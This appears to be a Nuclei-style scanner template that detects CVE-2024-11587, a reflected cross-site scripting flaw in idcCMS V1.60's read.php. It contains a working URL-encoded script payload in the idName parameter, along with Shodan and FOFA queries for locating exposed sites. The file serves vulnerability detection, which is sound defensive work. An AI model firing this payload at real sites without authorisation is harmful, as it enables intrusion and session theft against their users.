info:
  name: idcCMS V1.60 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    idcCMS V1.60 is vulnerable to reflected cross-site scripting (XSS) via the idName parameter in read.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities.
  remediation: |
    Update idcCMS to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the idName parameter in read.php.
  reference:
    - https://github.com/Hebing123/cve/issues/75
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11587
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-11587
    cwe-id: CWE-79
    cpe: cpe:2.3:a:idccms:idccms:1.60:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: idccms
    product: idccms
    fofa-query: title="idcCMS"
    shodan-query: title:"idcCMS"
  tags: cve,cve2024,xss,idccms

http:
  - method: GET
    path:
      - "{{BaseURL}}/read.php?idName=1%3Cscript%3Ealert(document.domain)%3C/script%3E&mudi=getCityData"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'add(new Option'
        condition: and